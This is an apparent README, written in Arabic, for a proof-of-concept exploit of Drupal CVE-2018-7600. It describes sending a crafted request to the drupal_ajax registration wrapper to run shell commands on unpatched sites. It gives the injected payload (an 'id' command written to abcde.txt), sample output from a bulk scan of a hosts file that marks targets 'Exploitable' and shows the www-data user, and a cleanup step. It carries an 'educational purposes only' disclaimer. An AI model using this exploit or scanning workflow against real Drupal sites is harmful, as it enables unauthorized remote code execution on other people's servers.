
إثبات المفهوم لـ Drupal CVE-2018-7600 / SA-CORE-2018-002
تسمح دروبال قبل الإصدار 7.58، و8.x قبل 8.3.9، و8.4.x قبل 8.4.6، و8.5.x قبل 8.5.1 للمهاجمين عن بُعد بتنفيذ تعليمات برمجية عشوائية بسبب مشكلة تؤثر على أنظمة فرعية متعددة مع تكوينات الوحدات الافتراضية أو الشائعة.
يرسل حزمة إلى wrapper drupal_ajax لتسجيل مستخدم. يسمح للمستخدم باستخدام علامة exec وتشغيل bash. يرسل هذا الإثبات اسم المستخدم والمعرف إلى abcde.txt.
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
يفحص http*://example.com/abcde.txt
[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text
%s = اسم الملف
الحمولة: معرف المستخدم، معرف العملية، والمجموعة
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s